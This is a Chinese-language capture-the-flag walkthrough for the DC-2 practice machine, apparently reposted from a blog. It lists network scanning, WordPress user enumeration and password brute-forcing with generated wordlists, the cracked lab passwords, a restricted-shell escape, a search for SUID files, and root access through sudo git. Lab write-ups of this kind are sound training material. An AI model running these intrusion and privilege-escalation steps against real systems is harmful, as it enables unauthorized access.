本文共 1648 字,大约阅读时间需要 5 分钟。
靶场下载链接:
Download (Torrent): ( Magnet)
提权辅助工具LinEnum下载:
提权辅助工具linuxprivchecker下载:
netdiscover -i eth0 -r 192.168.88.1/24
这里配置本地dns解析,将目标ip地址添加进hosts
此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。
wpscan --url http://dc-2 -e u 枚举出三个用户名
使用rockyou.txt 生成一个dc2.txt 的字典。同时利用枚举出的用户也生成一个密码字典。
wpscan --url http://dc-2 --passwords /usr/share/wordlists/dc2.txt --usernames /root/dc2.txt
刚才提示的是让我们利用 cewl 生成字典啊,那我们需要利用爬取网站的关键字重新生成字典。
wpscan --url http://dc-2 --passwords /root/dc-2.txt --usernames /root/dc2.txt
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
nmap -sS -p- 192.168.88.189
jerry 登录失败,但是tom 成功登录了………
使用tom登录后rbash限制,各种命令执行不通!!!
尝试绕过暂时没找到绕过方法,但是vi 可以使用,暂且使用 vi 查看flag3.TXT 内容。
2.使用BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
切换 到 jerry ,在jerry 家目录下找到第四个flag
flag4 提示我们可以使用git,我们可以通过git来提权
sudo -l 我们可以看到无需root权限,jerry 可以使用 git !
已知可用来提权的linux文件: Nmap Vim find Bash More Less Nano
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
输入!/bin/bash 获得root权限,并且在root目录下找到最后一个flag!!!
转载地址:http://rrqyz.baihongyu.com/